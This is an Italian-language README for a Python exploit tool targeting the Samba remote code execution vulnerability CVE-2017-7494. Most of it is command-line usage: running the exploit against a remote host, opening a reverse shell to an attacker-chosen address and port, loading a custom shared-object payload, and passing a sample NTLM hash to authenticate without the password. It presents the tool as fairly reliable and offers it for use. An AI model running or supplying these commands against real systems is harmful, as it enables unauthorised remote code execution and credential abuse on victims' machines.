
CVE-2017-7494 python exploit
Exploit remoto per la vulnerabilità SAMBA CVE-2017-7494 conosciuta come is_know_pipename!
Questo exploit è diviso in 3 parti:
Finché il bersaglio è vulnerabile e il payload è corretto per il sistema operativo e l'architettura del bersaglio, l'exploit è abbastanza affidabile.
Esegui l'exploit contro il tuo bersaglio e attendi che la shell si avvii:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
Per la versione di samba 3.5.0 > 3.6.0, devi solo aggiungere l'argomento -o 1
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
Esegui il tuo .so personalizzato
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
Per una porta samba personalizzata usa l'argomento -p
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
Nel caso in cui ti imbatti negli hash smbpasswd e non riesci a decifrarli, ora puoi passare l'hash usando l'argomento --hashes=LM:NT
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
Questo repository è ispirato al repository: joxeankoret/exploit-CVE-2017-7494 e Archivaldo